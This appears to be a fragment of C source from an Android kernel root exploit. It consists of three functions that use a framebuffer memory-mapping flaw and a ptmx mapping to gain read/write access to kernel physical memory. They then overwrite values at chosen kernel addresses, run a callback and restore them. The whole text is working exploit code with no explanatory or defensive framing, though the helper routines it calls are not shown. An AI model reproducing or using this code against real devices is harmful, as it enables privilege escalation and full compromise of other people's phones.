static bool attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param) { unsigned long int offset; int fd; void *address; bool result; offset = get_kernel_physical_offset(); if (offset) { fb_mem_set_kernel_phys_offset(offset - 0x00008000); } address = fb_mem_mmap(&fd); if (address == MAP_FAILED) { return false; } result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, address), KERNEL_SIZE, callback_param); fb_mem_munmap(address, fd); return result; }
bool map_kernel_memory(void) { if (!kernel_physical_offset) { if (!setup_variables()) { return false; } } fb_mmap_fd = -1; kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS; if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) { return true; } fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000); printf("Attempt fb_mem_exploit...\n"); fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd); if (fb_mem_mmap_base) { kernel_mapped_address = (unsigned long int)fb_mem_convert_to_mmaped_address((void *)KERNEL_BASE_ADDRESS, fb_mem_mmap_base); return true; } fb_mmap_fd = -1; return false; }
static bool attempt_fb_mem_exploit(unsigned long int address, unsigned long int write_value, unsigned long int restore_value, callback_info_t *info) { unsigned long int offset; offset = get_kernel_physical_offset(); if (offset) { fb_mem_set_kernel_phys_offset(offset - 0x00008000); } if (fb_mem_write_value_at_address(address, write_value)) { run_callback(info); fb_mem_write_value_at_address(address, restore_value); return true; } return false; }